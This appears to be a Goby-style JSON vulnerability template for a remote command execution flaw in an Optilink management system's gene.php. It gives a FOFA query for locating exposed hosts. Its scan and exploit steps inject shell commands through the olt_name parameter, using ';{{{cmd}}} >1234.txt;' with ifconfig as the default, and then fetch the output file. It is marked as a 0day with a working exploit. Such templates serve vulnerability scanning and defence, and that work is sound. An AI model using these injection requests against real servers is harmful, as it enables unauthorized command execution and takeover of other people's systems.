{ "Name": "Optilink Management system gene.php RCE", "Description": "

An arbitrary command execution vulnerability in the gene.php file of a background management system product of Optilink, which can execute arbitrary commands or upload malicious PHP Trojans to control the server.

Attackers can upload malicious php Trojans to control the server.

", "Product": "Optilink", "Homepage": "https://optilinknetwork.com/", "DisclosureDate": "2022-03-23", "Author": "abszse", "FofaQuery": "body=\"/html/css/dxtdata.css\"", "GobyQuery": "body=\"/html/css/dxtdata.css\"", "Level": "2", "Impact": "

Attackers can upload malicious php Trojans to control the server.

", "Recommendation": "

1. Strictly verify the interface and restrict file writing

2. Set up a whitelist

", "References": [ "http://fofa.so" ], "Is0day": true, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "ifconfig", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/cgi/fsystem/gene.php?olt_op=1&olt_name=\"\">4399.php;", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "GET", "uri": "/cgi/fsystem/4399.php", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "6c14da109e294d1e8155be8aa4b1ce8e", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/cgi/fsystem/gene.php?olt_op=1&olt_name=;{{{cmd}}}%20>1234.txt;", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [] }, { "Request": { "method": "GET", "uri": "/cgi/fsystem/1234.txt", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": ["output|lastbody|"] } ], "Tags": [ "rce" ], "VulType": [ "rce" ], "CVEIDs": [ "" ], "CNNVD": [ "" ], "CNVD": [ "" ], "CVSSScore": "10", "Translation": { "CN": { "Name": "Optilink 管理系统 gene.php 任意命令执行漏洞", "Product": "Optilink 某后台管理系统", "Description": "

Optilink 某后台管理系统产品 gene.php 文件任意命令执行漏洞,可执行任意命令或者上传恶意的php木马控制服务器。

攻击者可上传恶意的php木马控制服务器。

", "Recommendation": "

1、对接口做严格校验,限制文件写入

2、设置白名单

", "Impact": "

攻击者可上传恶意的php木马控制服务器。

", "VulType": [ "命令执⾏" ], "Tags": [ "命令执⾏" ] }, "EN": { "Name": "Optilink Management system gene.php RCE", "Product": "Optilink", "Description": "

An arbitrary command execution vulnerability in the gene.php file of a background management system product of Optilink, which can execute arbitrary commands or upload malicious PHP Trojans to control the server.

Attackers can upload malicious php Trojans to control the server.

", "Recommendation": "

1. Strictly verify the interface and restrict file writing

2. Set up a whitelist

", "Impact": "

Attackers can upload malicious php Trojans to control the server.

", "VulType": [ "rce" ], "Tags": [ "rce" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }